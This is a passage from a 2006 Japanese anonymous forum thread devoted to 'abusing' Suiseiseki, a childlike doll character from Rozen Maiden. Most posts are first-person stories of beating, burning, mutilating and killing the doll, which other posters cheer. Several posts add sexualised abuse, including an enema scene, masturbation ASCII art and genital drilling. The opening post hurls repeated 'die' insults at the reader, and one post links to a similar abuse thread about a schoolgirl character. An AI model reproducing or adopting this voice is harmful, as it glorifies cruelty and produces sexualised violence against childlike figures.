お前はもっと現実を知れですぅ!いつまでも引きこもってネクラなことしてる場合じゃねーですぅ!
でも、もー手遅れですぅ!お前は何をやってもダメですぅ!
この世に生まれてきたことを後悔してもダメですぅ!お前は生まれ変わってもどうせダメ人間に決まってるですぅ!
絞め殺したいけどお前にさわるのが嫌なのでやめるですぅ!
でも、お前みたいなチビは死ねよですぅ!風呂の排水口に吸い込まれて死ねよですぅ!!!
絶対許さんですぅ!絶対許さんですぅ!絶対許さんですぅ!
お前みたいなヤツは絶対許さんですぅ!

223 :名無しちゃん…電波届いた?:2006/08/19(土) 11:08:39
お前みたいなヤツは絶対許さんですぅ!
早く消えろですぅ!さっさとこの世からいなくなれよですぅ!
いつまでも勘違いしたまま生きていけると思ったら大間違いですぅ!
このまま生きててもお前にはいーことなんにもねーですぅ!
何でもいいからさっさと死ねですッ!!!
あ、なにするですかぁ!!やめるですぅ!!!
いやですぅ!!!こっち来るなですぅ!!浣腸器なんかどうするつもりですか!!!
ごめんなさいですぅ!!翠星石が悪かったですぅ!もうしませんで・・・あ、ああ!!
いや・・・ですぅ・・・、いや・・・いやああ・・・ですぅ・・・ああ・・・。

           ___
         く/',二二ヽ>
.          |l |ノノイハ)) ・・・
.          |l |リ゚Д゚ノl|
.         ノl_|,   つ
        ≦(_(_, )≧  ビチャビチャ
        ミ !;:i;lしし'  ミ
          ii:;l|;:;::;:::⊃
        ⊂;::;.,.';;;;'::.:.;::.⊃


          ___  ピチャピチャ
.       く/',二二ヽ>
     ィ⌒`ノl |ノノイハ)) もったいねぇですぅ
   と、_入≦mリ。 。ノ≧m:;;:;::;:::⊃
  ⊂;::;.,.';;;;'::.:.;::.;::;.,.';;;;'::.:.;::.⊃

224 :名無しちゃん…電波届いた?:2006/08/21(月) 21:59:03

    \           ,',i><iヽ          ./
      \         /((ノ。リノ))       ./
       \      〈《(* 々゚ノ)|      /
  ,',i><iヽ  \ミ   ⊂[{.∞}]ノ     ./
 /((ノ。リノ))   \ ┠しヽ_)     ./,',i><iヽ
 〈《(* 々゚ノ)ー┐  \≡  ┷┷   ./ /((ノ。リノ))
 しヽ   し′    \∧∧∧∧/  〈《(* 々゚ノ)
 彡 >  彡)      <    糞 >    /,   .つ
  /  / /       < 予 苺  >  (_(_, )
 (_(__)      <    の >     しし'
─────────< 感   >──────────
             <     >    ____
  ,',i><iヽ      <  !!!   >.    | |・∀・|  ,',i><iヽ
  /((ノ。リノ))      /∨∨∨∨\...  | |\  |`イ/((ノ。リノ)) カク
ヽ〈《(* 々゚ノ)ノ    /    ||      .\(( |_|_ィ⌒`〈《(* 々゚ノ)
   へ  )   /  ,',i><iヽ      \ノ と、_入`_,つ λ う
      >  ./    ((ノリ ノ))       .\カク
       /     〈《/ ヽノ)          \
      /       | |   |           .\
    /         ∪ / ノ            .\
   /           | ||               \
 /.            ∪∪                .\

225 :名無しちゃん…電波届いた?:2006/08/22(火) 07:13:28
  ((((((((┗┓     ┏┛)))))))
          ┗┓ ┏┛
        ,.,.,.,.,.,.,.,.,__
      ,;f::::::::::::::::::::::::::ヽ
      i/'" ̄ ̄ヾ:::::::::::i
      |,,,,_ ,,,,,,_  |::::::::|
      (◎);(◎)==r─、|
      { (__..::   / ノ′
      ', ==一   ノ^<\
        !___/_>、,,◎<\
        Σ))~Σ)(◎。(● <)
       ⊂))~~⊂(。(◎ ~゜...<}
        ⊂))~~⊂(。(・◎。<ノ
         ⊂))~⊂(◎⌒<(
          ⊂))~⊂(◎⌒}\从从从从从从从
           ⊂))~⊂(◎^⌒VVVVVVVVVVV`ヽ
            ⊂))~⊂(◎。)。)。)。)。)。)。)。))
              ⊂))~⊂( ◎⌒◎⌒◎⌒◎⌒ノノ
                ∪~~∪~∪~∪~∪~∪~∪~\) ))))




226 :名無しちゃん…電波届いた?:2006/08/23(水) 09:57:47
こりゃひでえwwwww

227 :名無しちゃん…電波届いた?:2006/08/23(水) 14:40:55
「うぉ?指輪がハマってる!いつのまに?」
「今日からお前は翠星石の下僕ですぅ」
「そんな?…っく指から抜けないぞ、これ?」
「ムダですぅ、無理に抜こうとすれば肉ごとそげ落ちるですぅw
 さぁこの翠星石に永遠の忠誠を誓いやがれですぅ」
「やだね、それにこんな緑色の変な指輪なんていらねーよ!
 熱湯かけたら膨張して抜けるかもな」
オレはヤケドするのもかまわずポットのお湯を悪趣味な指輪にかけた。
「熱っ!」
熱さに顔をしかめると同時に悲鳴があがった。
「んぎゃあ〜〜っ熱つつっ熱いですぅっ!!!」

も、もしかして…

「はひーっ、はひーっ、ああ熱いですぅ!なんでですか?」
オレはすぐさま手に氷水をぶっかけた。
「びえええっ冷たい!冷たいですぅ!」
熱湯をかける。
「熱っ熱いです!」
氷水をかける。
「ひゃっこいですぅ!」
オレが指輪に何かするたびに目の前の人形が悶絶する。
どうやら指輪とこいつは同調してるらしい。
無理に抜こうとすると指の肉が云々というのはこのカラクリを見抜かれないための方便かw
「おい糞人形」
「だ、誰が糞ですか!口の聞き方がなってねーです!」
「口の聞き方がなってねーのはオマエの方だ、もうバレてんだからな」

228 :名無しちゃん…電波届いた?:2006/08/23(水) 14:41:50
「な、なーにわけわからねーことほざいてやがるですか!これだから下等な人間は」
オレは小ぶりなハンマーで指輪を叩いた。
「ふぎゃっ!痛ぁ!」
悲鳴をあげ体を抱えてうずくまる翠星石。
「言葉には気をつけるんだな、下僕なのはてめーの方だ」
「そ、そんな馬鹿なです…」
「なるほど、オマエ自身も知らなかったというわけか!こりゃ笑えるぜ!ところで今『馬鹿』とか言ったな?
 口の聞き方に気をつけろと言ったばかりだろーがよ!この糞人形!」
オレは指輪がハマってる方の拳で壁をなぐった!
「ぎゃはっ!痛いっやめて!」
壁パンチ!壁パンチ!
「げふっ!うぐっ!ぎゃあんっ!や、やめやがれですぅ!」
ふと見ると指輪に細かい傷やヒビが入っている。
人形の方も傷とヒビが入ってきている。
目はうつろでヨダレをだらだら流し荒い息をぜぇぜぇはいている。
「おい糞人形オレに忠誠を誓え」
「誰がおまえなんぞに誓うかです…」
壁パンチ!
「ぎゃはっ!やめて」
「誓え!」
「嫌ですぅ」
壁パンチ!
「いやぁ!か、顔にヒビが!」
「誓え!」
「誓う!誓うですぅ!」
こうしてオレはていの良い下僕を手に入れた。
抵抗するなら即壁パンチさww

229 :名無しちゃん…電波届いた?:2006/08/23(水) 22:33:21
今日も日頃のストレス、憂さ晴らしに「翠星石」を虐待。嫌がる奴の両手の指をシュレッダーに強制挿入させる。ヴィィィン
ガリガリガリガリガリガリ!「ひぎっぅぎゃあああああ!!痛い!痛い!痛いですぅ!」
見事に10本あった指が切断された。次に100℃の熱湯を満たした洗面器に
指なしジャンクの顔面を無理やりつける。「あつ!!熱いです!やめろですぅ!!」等といつも通りの
リアクションをみせるが、俺は構わず熱湯の中で翠星石を溺れさせた。
30分も苛めると、翠星石はいつもの泣き言を言い出した。「何でこんな事するですか〜うぅ…ひどいですぅ…うぅ、えぐっぐすん…」
…こいつの泣き顔を見ながら思った。明日はどんな虐待を加えてやろうか、と……。

230 :名無しちゃん…電波届いた?:2006/08/23(水) 23:03:16
随分な時事ネタだな

231 :名無しちゃん…電波届いた?:2006/08/25(金) 01:00:41
「人間、暑いですぅ!エアコンつけやがれですぅ!」「あぁ?今エアコン壊れてんだよ。」
「まったく使えねーへっぽこ機械ですぅ!」…頭にきたので、近所を流れる深い川に
こうるさいバカ人形を投げ込んだ。バシャーン!「ゲボッ!ゴボゴボ〜ぷはっ!ぐ、ぐるぢいですぅ〜助け…」
どうやら翠星石はカナヅチらしい。不様にも溺れてもがいてやがる。
面白いので暫く様子を観察。「た、助けてです!ぶはぁ〜げほっ!苦しいですぅ!!」
「こんな分厚いドレスじゃ泳げねぇよなぁ〜」俺は独り言を言うと、暑いのでアイスを買いにコンビニへ向かった。
…その後緩やかな川の流れに乗って、緑色のドザエモン(溺死体)が下流を漂うのだった。

232 :名無しちゃん…電波届いた?:2006/08/25(金) 01:09:28
クソミドリを見つけたので虐待することにした。

 他人の目に触れるとまずいので家に連れ帰る事にする。
 風呂場に連れ込みゴム手袋をはめてクソミドリの肛門を広げて七味唐辛子投入。 (ですぅー!)
 七味唐辛子を入れた後は剃刀で髪の毛をそる。 (ですぅー!)
 髪の毛を剃った事を確認し、100℃の熱湯攻め。 (ですぅー!)
 熱湯攻め後は顔面を蹴りまくる。 (ですぅー!)
 蹴りまくった後は、全身にくまなく冷水をかける。(ですぅー!)

 その後に、花丸ハンバーグを食う瞬間におもいっきり蹴りつける。 (ですぅーーーーーーーーーーー!)
 そして俺はとてもじゃないが飲めない赤いタバスコを買ってきて10本飲ませる。
 もちろん、口をこじあげて無理矢理飲ませる。 (ですぅー!)

 その後は両足をくくりつけて室内サッカーをするこのボールはよく転がる  (ですぅー!)
 そしてクソミドリにムカついてる蒼星石が思い存分1ローゼンメイデンとしての闘争本能を満足する。(ですぅー!!)
 ぐったりとしたクソミドリをダンボールの中に剣山をしいただけの
 豪華な入れ物に放り込み出ないように蓋をして就寝。(ですぅー!!)

233 :ららぽーと:2006/08/28(月) 22:44:01
( ゜∀ ゜)<ゲロミドリ!糞ミドリ!史上最低のクズ人形「翠星石」。
長くてウザイ巻き糞うんこヘアー&緑のボロキレ纏っておしゃれですぅ!


234 :名無しちゃん…電波届いた?:2006/08/30(水) 13:50:10
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) もっと虐待しやがれですぅ
     |l |(* 々゚ノ|
   ≦ノl/ っっl≧
   ミ  しー‐J ミ

235 :名無しちゃん…電波届いた?:2006/08/30(水) 14:01:08
>>234
いちいち他の虐待スレもageんな馬鹿

236 :名無しちゃん…電波届いた?:2006/09/02(土) 21:25:10
ですぅですぅ言ってるバカ人形を四肢切断して首輪繋いでサンドバックに!
殴られる度に「痛いですぅ!やめてですぅ!」とほざく。
体中がボロボロに砕けるまで殴れ! 「痛いですぅ!!ヒドイです!何しやがるですぅ!!」
救われない地獄に堕ちた木偶人形が!!

237 :クソミドリ:2006/09/04(月) 17:32:32
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) GJですぅ
     |l |(* 々゚ノ|
   ≦ノl/ っっl≧
   ミ  しー‐J ミ

238 :名無しちゃん…電波届いた?:2006/09/05(火) 17:23:39
  /.:::::::,'    /.::::::::::::::::::::::::::/  |:::::!、::::::::::::::\::::::::::: :: :: :: : :ヽ
 /.:::::::::::ハ.  ./.::::::::::::/|:::::::::/   !::::! \::::::::::ヽ\:::::::::: :: :: : : :ヽ
. {.::::::::::/  `'''/.::::::::::::/ i:::_,,/....,,_  !:::|    \:::_:,,ヽ,,.ヽ,:::::::::: :: :: : :',
. l.:::::::N   /.::::::::::::/‐T:::/   `' ヽ{     ''\:::::ヽ ヽ::::::::::::: :: : :l
 ',:::::|.    /:::::::::::::/  l::/             \::ヽ ヽ:::::::::::::::::::::!
  ヽ.{   ,イ::::::::::::::l  |´    __       _,   \}  ヽ::::::::::::::::::|
     ∠::イ:::::::::::l    , ===、        ,.===、.`   ヽ};:::::::::::::!
       |::::;::::;;:l,.  /,. 'ひ~ヽ         /ひ~ ヽ\   レ‐、::::l
       レ´|;/丶! / {::::::::::::::}      {::::::::::::::} 丶   /.. |::::!
         l, 〈. |    丶::;;;::ノ      丶::;;;;::ノ     〉:: iヽ{
           \_.l .:::::::::.        ,       .::::::::::.  /:: /  `
.            !          ,へ           、_ ,/
              ヽ、      i .|_____       ,イ::::/
.               > 、_.   | .|、  ノ   _, イ/|/
               _/   マ '' ‐-| .L ,,,,... -‐ ' ´y \___
         ,. '" ̄ヽ     \. ,!  |_,,.. -、/~ 〉'′ /  ヽ
.         /       \.     `/ "´     〉 /   /   `,
         {.         \  /   ー<;: { / ,. '′     l
          |         `'‐i′  _,,__ `Y/||´       |

苺ましまろの伊藤千佳ちゃん虐待・虐殺スレ
http://ex11.2ch.net/test/read.cgi/campus/1157367728/

239 :名無しちゃん…電波届いた?:2006/09/05(火) 23:07:27
翠星石ぃひひひひ!!死ねおらぁ!!!ドスッ!バン、ゴン、グシャ!バキッバコッ!ドン!スパッ!グサッ!
「う!うぅ……痛いですぅ!何でこんな…」ああああああああああああ!!
悪魔に憑依された狂気の少年は、今夜も翠星石と自分の部屋を破壊するのだった…。
「や、やめるです!怖いですぅ…!」泣きべそをかきながら震える糞翠は
あまりの恐怖に失禁&脱糞してしまった。くせぇ!くせぇぇぇぇぞゴラァ!!!
少年は持っていた金属バットを翠星石の頭に何度も振り下ろした。「いぐっ!!うぐっ!ですぅ!!」
「ですぅ!」じゃねぇ!糞ミドリぃぃぃっ!!!バコーン!グチャ!!飛び散るカケラ。飛び出たオッドアイ。
ざまーみろ!アヒャヒャヒャヒャヒャヒャヒャヒャヒャ!!

240 :名無しちゃん…電波届いた?:2006/09/11(月) 00:34:10
ですぅですぅ五月蠅いクソミドリがいたので、とりあえず殴った。
そしたら「痛いですぅ!」とかマゾな事言いやがったので、更にタコ殴りにしといた。
「痛いですぅ…やめてですぅ!」とかまだマゾな戯言をぬかすので
金槌で原形をとどめないほど乱打してみた。それでも 「何するです……蒼星石…助けてですぅ…」
とか言うので焼却炉に放り込んどいた。…翠星石虐待はたまんねぇですぅ!!

241 :クソミドリ:2006/09/11(月) 17:06:51
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) GJですぅ
     |l |(* 々゚ノ|
   ≦ノl/ っっl≧
   ミ  しー‐J ミ

242 :名無しちゃん…電波届いた?:2006/09/11(月) 22:04:07
虐待SS書いてて悲しくならない?
もう少し未来に目を向けたほうがいいよ

243 :ブービー:2006/09/11(月) 23:48:04
(。∀ 。)あ、あい!わかりました!悲しいので翠星石たんをなめなめ
なでなでペロペロします!レロレロチュパア〜!
「い、嫌あぁっ!気持ち悪いですぅ!やめろですぅ!」(;゜Д ゜)ハァハァハァハァハァハァハァハァハァハァハァ翠星石たん!!!

244 :名無しちゃん…電波届いた?:2006/09/12(火) 00:12:12
>>243
翠厨の思考パターンをよく理解してますね

245 :ブービー:2006/09/12(火) 03:11:56
>>242
悲しいどころか楽しいから書いてるですぅ。寝言は寝てから言いやがれですぅ!

246 :クソミドリ:2006/09/17(日) 17:31:37
      ___
    く/',二二ヽ> 
     |l |ノ。ノイハ)) ウンコうめぇですぅ!
     |l |(*;々゚ノ|
   ≦ノl/ っ●;≧
   ミ  しー‐J;; ミ

247 :名無しちゃん…電波届いた?:2006/09/20(水) 10:32:09
どう見てもオナニーの最中↓
                   _ ......... __
               ,.ィ"/,. ィ'":.:.:.:\:.:`丶、
             / / ,:":.:.:.:.:.:.:.:.:.:.:.:ヽ:.:.:.:.:.\
            / ./ /:.:./:.:.:.:.:.:.:.|:.:ト;.:.:l:.:.:.:.:.ヽヽ
          /  / /:.:./:.:.:.:.:.:.:.:/:.:| ',:.:ト、:.:.!:.:.l:.',
         く   ,'  l:.:.:.:l:.:.:./:.:.://_/ .l:/ー-ヽ:.:| ',|
           ヽ、.」  l:.:.:.:.l:.:.l_:/フ ' /' 、,,,,,.ノ:./ ′
             /:.:.{  !:.:.:.:.Vr   ,,ィ ′  ///イ}
            /:.:.:.:{   ヘ:.:.:.:\=''"//   _   ハ!   おまんまん気持ちいいですぅ〜♪
           /:.:.:.:.:.{   ,イ_ヽT rr‐',  <ノ  , ' }    
          /:.:.:.:.:.:..{ r-,.‐-.、>、ヽヽヽ ..__/   } 
         /:.:.:.:.:.:.:.:{ </: : : : :ヽ} ヽ、  ,ヽ,‐;.:.::{

       翠星石は翠星石のおまんまん弄るですぅ〜♪
        あぁん・・・あぁん・・・気持ちいぃですぅ〜♪
         ヌルヌルした汁が出てきたですぅ〜♪

こいつ生意気だから痛めつけてやろう・・・

248 :名無しちゃん…電波届いた?:2006/09/20(水) 10:32:45
     ⊂且∩      ___
 ♪   (・x・ )   . く人二,'ヽ>
     (_ ̄iつ ,---'、< >))|l
  ( ((  |人 (      VД´iリ|
      `/ /  ) ))⊂l_介_|)|ヘ
       i _|ヽ   ≦ノヽノ`ヘ.≧
       |_)'。   ミ<二二二>ミ
        ∵
        ∴+


           _,-,
    ⊂iヾ、 ∩且つ/      ___
    ≡ \ .( ・x・)/    く/',二二ヽ>
        ヽ i' |,へ    |l |ノノイハ))
 ≡       )人i 、ゝ. 人l|リ`Д´ノl|
         / /   ヽ< >l_介」つ
    ≡   //  ゚∴.  Vノ`ヽノヘ≧
       (/    ∵+.  ミく二二二〉ミ

249 :名無しちゃん…電波届いた?:2006/09/20(水) 10:33:21
                   _/)
                / / 且 つ
                \(・x・ )⌒_)⊃
                 / '  (
                i⌒iヽ _, ゞ
                 ∪/ ,/   ∴
                  人| +∵。
                く< >ヽ>
              ,.ζ.l|ノノVイハ))
             ⊂'⌒≦つリ>_<ノミつ


                   ___    ∞ 〜
                 く/',二二ヽ>
             ν⌒.ζ|l |ノノイハ))
            ⊂_:#:≦|リ#:;)Д。#)

250 :名無しちゃん…電波届いた?:2006/09/20(水) 10:34:02
                   ___ 
                 く/',二二ヽ> 〜∞
             ν⌒.ζ|l |ノノイハ)) 
            ⊂_:#:≦|リ#:;)ДT#)  ・・・・・・・・・・・・・翠星石のおまんまんでもおくちでも使わせてやるですぅ

翠星石のおまんまん?そんな物薔薇乙女には必要ない、ヤスリで削り取ってやろうw
生意気言ってるからこういうことになるんだよwwwwwwwwwww
何が「ですぅ」だ糞泥人形 !
お前を見てるとムカつくんだよ!この糞生意気性悪ジャンクドール翠星石め!
とっとと産廃物処理場に逝け!
「い〜や〜ですぅ!おまんまんがあるから翠星石はジュンに家に置いてもらえるのです!
 おまんまんが無い翠星石なんてジュンに捨てられちゃうですぅ〜!」
じゃあ今すぐ捨ててやろうか?こんなのがローゼンの作品だなんて、第3ドールは最低の駄作だな!
「待って、待ってほしいですぅ〜!い、今ドリルを使って自分でお股に穴あけるです!
 翠星石が自分で自分のおまんまん作るですから、捨てないでほしいですぅ!」
さっきも言ったはずだ、お前はミドリのドレスを被ったゴミ!ジャンク以下のサイテーメイデンなんだよ!
「ああっ?!ドリルが、おまんまんから胃袋まで貫通しちまったですぅ!!いったい翠星石はどうすれば・・・そうです!
 ジュンに翠星石の胃袋を縫ってもらえれば・・・。」
はァ?ふざけんな!何で俺がおまえみたいな性悪の腹をメンテしてやんなきゃなんねーんだ!せいぜい喰って垂れ流してろよw

251 :名無しちゃん…電波届いた?:2006/09/22(金) 00:45:19
…誰が何と思おうと翠星石はアリスには程遠い存在だ。

252 :名無しちゃん…電波届いた?:2006/09/24(日) 08:57:02
「おっはよ〜ですぅ!今日も駄目人間とうんざりな一日の始まりですぅ!」
次の瞬間、俺は閃光のごとき早さで糞翠の腕を掴むと、勢い良く壁に叩きつけた。ドシャーン!!「ぐはっ!…ふぅ…ですぅ」
「何しやが!?」糞翠が喋る前に顔を思いっきり殴る。バコーン!!「ぶふぅっ!!」汚ぇ唾液が飛沫となって宙を舞う。
「痛いですぅ!!ふざけんなですぅ!何で翠星石がこんな目にあわなきゃならないです!?」
「俺の知った事か!!」ドスッ!ドコッ!ベシッ!更に暴行を加える。気がすむまで殴る蹴る…
ふと我に返ると、眼前には緑色のボロクズが口から泡を吐きながら仰向けに倒れていた。
俺はボロクズの顔に唾を吐くと、奴の体をサッカーボールの様に蹴飛ばし始めた。

253 :名無しちゃん…電波届いた?:2006/09/24(日) 09:18:44
ドスッ!ドスッ!ドガッ!クソミドリは不様にも階段を転げ落ちて玄関に蹲る格好となった。
「ぐふぅ!げほっ!ハァハァハァハァ…く、苦しいですぅ!やめてですぅ…」衝撃で目覚めた糞翠は
全身の激痛に地獄の様な苦しみを味わうのだった。俺は瀕死の糞人形の胸倉を掴むと、
開け放たれているドアの外に投げつけた。アスファルトの上で息も絶え絶えに「うぅ…痛いですぅ…誰か助けてです…」等と呟く。
…とどめを刺すべくキッチンから持って来た包丁で糞翠の左胸目がけて 深々と突き刺す。グサァ〜
「!!うぐぅ!ひっぐ、ですぅ…」絶命した…。俺はその後、このジャンク人形
の不様な亡骸を、外のゴミ捨て場の生ゴミのポリバケツにぶち込んでおいた。キラキラ光るローザミスティカにも目をくれずに………

254 :翠星石:2006/09/26(火) 22:43:58
…翠星石の勝利ですぅ!愚かなひきこもりちび人間どもには翠星石は倒せないのですぅ!


255 :名無しちゃん…電波届いた?:2006/09/27(水) 08:25:03
>>254
ゲシッ!
「イタイですぅ!」
日頃のですぅ節と「おのれをしりやがれですぅ」の図々しい暴言に堪忍袋の緒がキレた俺は、
クソミドリをやつの鞄で思いっきりブッ叩く。
「ひぐぅぅ!か、鞄で暴力・・やめ・・ろ・です・ぅ
殴りまくるのにも飽き飽きしてきた俺は、メッタ殴りで弱ってきたクソミドリに掴みかかる。
頸と背中を押さえつけてうつ伏せに床に擦りつけると、両手両足を背中に回して束ねあげてくるくると縛りあげ、
その縄尻を天井の蛍光灯の紐に括り付けた。
判る連中には、判るだろう。所謂、「駿河責め」といわれる拷問の縛りのスタイルだ。
宙吊りにされたクソミドリを5分ほど、何十回転もゆっくりと廻す。
そして手を離すと、回転で絡まったロープの反動でクソミドリが勢い良く猛烈な逆回転を始めた。そうそう、これやってみたかったのさね!
「ぶぶぅぶるぅぶるぶるbるぅ!めめぶるぅ!めががめめめががまわわわwrぅぅでぇすぅうぅぅ!」
クソミドリを強烈な遠心力が襲う。
回転と共にクソミドリのチャームポイントであるフカフカフリルのパニエスカートと二股おさげ髪がヒラヒラと舞い、
それに思わず見とれた俺は、面白がって数十回ほど、この反動回転責めを繰り返した。
このクズ人形でもまだ美的に魅了する要素があったとは。
これであのクソ毒舌と妙に恩着せがましい、かまってちゃん性格が矯正されれば、
まあキラ&バラよりは格上にしてやったっていいがなw
なんてことを考えながら俺は何度もクソ翠をクルクルとまわし、そよ風のエチュードのようなスカート&オサゲの舞を堪能した。
回転は暫く続き、クソミドリは次第に朦朧となる意識のなかでだらしなく涎を垂らし始めた。

256 :名無しちゃん…電波届いた?:2006/09/27(水) 08:25:58
そろそろ飽きてきた俺は、緩やかに回転がおさまるところを狙い、朦朧としているクソミドリを満タン2リットルペットで力一杯ぶっ叩いた!
「びぃひhぃぐぐふっぅ!」
「へへっ!もうぅいっちょうぉお!」
バゴォッツ!
俺は両手の満タンペットでクソミドリをタコ殴りの往復ビンタにした。
殴られるたび、「ぶひぐぅ!ぶべっつ!ぶげでぅすぅ!」などと得体の知れない阿鼻叫喚のハーモニーが最高の楽しさだ。
クソミドリの苦しむ様を眺めるのは最高の快楽、ストレス発散になるのはこのスレ住人には言わずもがな、だよなあw
「へへへっ!そういや、往復ビンタなら、こいつのほうが面白れえw」
そういうと俺は天井で回転しているファンのハネを自慢の怪力で折り曲げ、ハネが垂直になるようにすると、宙吊りのロープの長さを、
クソミドリの眼前に丁度ファンの刃先がくるように調節し、ファンのハネの間に翠星石の顔面をはさむようにポジショニングした。
そして空調ファンの電源をONにすると・・・・・
「ぶぶぶデスゥデスゥデスデスデスゥぶぶっぶうぶうぶぶうぶぶデスゥデスゥデスデスぶぶデスゥデスゥデスデスぶぶぶデスゥデスゥデスデスぶぶぶ
 デスゥデスゥデスデスぶううぶぶぶっぶぶbデスゥデスゥぶぶbbっぶぶぶぶっぶデスデスぶぶbbっぶぶぶぶっぶぶぶ・・・」
かくしてクソミドリの永久無限往復ビンタ・ショーの幕開けだ!
時折クソミドリが身体をよじらせ顔面がファンから外れるようにもがくので、床に転がっていた鞄の取っ手に紐をくくりつけ、
鞄ヌンチャクよろしく振り回しながらクソミドリのボディにスマッシュヒットさせる。
顔面無限ビンタ・鞄によるメタ殴りのダブル虐待に、クソミドリの意識は遠のき・・
暫くすると顔面のビスクパーツに罅が入り始め、それからほどなく、ピキッ!パリッ!と不気味な音と共に、
クソミドリの頭部パーツはゆっくりと罅割れて砕けていき、30分後には無残な首無しドールとなったとさ。
粗大ゴミにすら出せないこのクソ人形の処理は、まあ燃やすしかないだろw
俺は再びこの首無しクソジャンクをクルクルと廻し始め、勢い良く逆回転のところを狙い、スカートに火をつけた。
勢い良く全身に燃え移り回転火達磨と化すジャンク翠。その様を、悦に浸りながらXOを傾けつつ鑑賞する俺だった。

257 :名無しになりきれ:2006/10/02(月) 23:26:29
おいクソミドリ!
「クソミドリと呼ぶなですぅ!だいたい何でクソミドリなんですかぁ!?」
ああ?だってオマエ庭師だろ?庭いじりとかするんだろ?
水まいたりウンコまいたりw
「ななな?!す、翠星石そんなもの庭にしたりしねーです!オマエといっしょにすんなですぅ!」
うるせぇ!庭の肥料つったら昔からウンコだろうが!
てめぇが作られた時代は化学肥料なんてまだねーだろーがよ!
つまりてめぇはずっとウンコ素手でつかんでまいてたってわけだ、
ウンコまみれの翠(みどり)だからクソミドリだ!
「ひ、ひどいですぅ!」
だいたいてめぇが手を洗ってるところ見たことねーぞ?
「人形はおまえたち人間みたいに自分の老廃物で汚れたりしないから洗ったりする必要はねぇと、な〜んど言ったらわかるですか!」
って、こたぁ今までてめえは手を洗ったことがねーってのか!
糞まみれの手であちこちさわったり菓子作ったりしてやがったのか!?
ぶっおえ、げえっ!急に気分が悪くなってきた!
オマエのせいだからな、このクソミドリ!

258 :名無しちゃん…電波届いた?:2006/10/06(金) 21:25:24
「…クソミドリ、てめぇまだ生きてんのかよ」「な、なんですか、いきなり…」
狼狽する翠星石の右腕を掴むと、そのまま壁に向かって叩きつけた。
「へぐっ!!うぅ…痛いですぅ!」「まったくしぶとい奴だぜ…お前をイジメんのも疲れたぜ」
「それならやめやがれですぅ!!翠星石はツラくて痛くて苦しいですぅ!」感情的になり涙ながらに訴えるクソミドリ。
小さな体をプルプル震わせながら吠える様は、俺の加虐心を喚起させ得るのに充分だった。
「面倒くさいがやるか…」そう言うと俺は、いつもの様に翠星石を虐待し始めた。
殴る蹴る殴る蹴る切る刺すねじる、そして叩きつける。瀕死の状態になるまで痛めつける。

259 :名無しちゃん…電波届いた?:2006/10/06(金) 21:45:27
「ハァハァハァ…うぅ…ですぅ…痛いですよ…」もう既にボロボロだ。「あ〜あめんどくせぇな」
俺はかったるかったのでさっさと事を済ませようと、刃渡りが17.6cmの海兵隊使用モデルのナイフを取り出すと
ぐったりしてる翠星石の喉元に冷たい刃をあてがった。「うう…や、やめてですぅ…どうしてこんな残酷な事するです…」
「どうして?俺にも良くわからん。ただお前を見てると無性に虐待したくなるのさ」
そう言い終えると非情な刃は翠星石の喉笛をかき切った。シュバーッ!!「ひぐっ!いぐっ!!……」奴は苦しそうに両手で喉を押さえていたが、やがて動かなくなった。
「…またやっちまった。」俺はそう呟くと、このジャンク人形を捨てに行くのだった。

260 :名無しちゃん…電波届いた?:2006/10/06(金) 23:31:34
>>258-259
GJ!

261 :名無しちゃん…電波届いた?:2006/10/11(水) 22:31:03
「おはよ〜ですぅ♪元気な朝は翠星石のスコーンから!ですぅ!」


              _ -- 、
     ス        入    _>   、_人__人__人__人__人__,
     タ        /:::/トイ::::|   _)               (_
    タ      /:::/:::|::::|:::::|   _) 元気な朝は   (_
   タ     /:::/:::;イ:::::l:::::|   _) 翠星石の      (_
   タ    /:::/:/:.!::::::l:::::l    _) スコーンから! (_
      _∠ニフ': : : :.',::::::l:::::l   _)              (_
   r┬':仁二): : : : : : :Y二二)  ⌒Y⌒Y⌒Y⌒Y⌒Y⌒
   └ハに二Y ー-: : :_:_:_`フイ
     `}\:.)ノ: : : : : : : : :└rう
     ⌒'7辷_┬┬┬イノ))
      / // / //⌒⌒´
    ' // / // /
    // / / '
.   /


ちぇすとおっ!!!(どっごすっ!)

「ですっ?!」(ぐしゃあっ!)

極真カラテで鍛えぬいた俺の拳が
朝っぱらから、お盆いっぱいの手づくりスコーンを持って入って来たクソミドリの顔面をぶち抜いた。
目鼻も口もいっしょにグシャグシャの破片になった。
まだ動いていたので、俺は苺ジャムをクソミドリの顔面にぽっかり開いた穴から流しこんでやった。
体内のぜんまいにジャムがからみついたのだろう
ぎぎぎ…ばちんっ!
切れたぜんまいが顔から飛びだした。

262 :名無しちゃん…電波届いた?:2006/10/15(日) 19:39:50
>ぎぎぎ…ばちんっ!

この表現気に入った

263 :名無しちゃん…電波届いた?:2006/10/16(月) 00:17:47
最萌で糞翠が負けますように!

      ヘ.  |ヽ
        >◎ |ミ
   .lヽ  ,、,、./||| .|ミ
  <)' 〜´ハバ |||/  ヽヽ
   | イノリノハ))||    ヽヽヽ
  ノ.人.l|///ノハヽ    ヽ.//∵ガスッ:,
 ( ( / 〉(つつ=========◎',二二ヽ>
  `/ /〈i父i〉〉 '    ヽニ二二/∵ グシャッ
  (⌒ (./!_jノ   ⊂_:#:≦|#:;)Д。#)

264 :名無しちゃん…電波届いた?:2006/10/22(日) 10:12:49
今日、資源ゴミの回収日だったんで、ゴミ置き場に出してきたんだ。

で、外出して帰ってきたら、俺んちの前に出したはずのゴミ袋が戻ってきてたんだ。

よく見たら袋に回収業者のメモが貼ってあってさ、そのメモに


『 翠 星 石 の 残 骸 は回収できません 』

って書いてあったよ。

ちっ、どっかに不法投棄するしかねぇな。まったくバラバラにしても世話のかかるクソミドリだぜ!

265 :名無しちゃん…電波届いた?:2006/10/22(日) 12:58:11
>>263
GJ.
こうなった以上俺はフェイト支援にまわる。
長門が負けた以上対抗馬はもうなのはキャラだけなんだ・・。

だってシャナには荷が重過ぎないか?

266 :名無しちゃん…電波届いた?:2006/10/26(木) 08:50:18
俺が国家機密級で回収してあげる。

267 :名無しちゃん…電波届いた?:2006/10/29(日) 00:55:29
980 名前: ◆w0smn73DlY 投稿日: 2006/10/28(土) 23:21:11 ID:TMoolqgf
確定

1位 2306票 翠星石@ローゼンメイデン トロイメント
2位 2239票 フェイト・テスタロッサ@魔法少女リリカルなのはA's

http://www106.sakura.ne.jp/~votecode/a06/coderesz1028.txt

グラフ
http://www106.sakura.ne.jp/~votecode/a06/graph1028.png


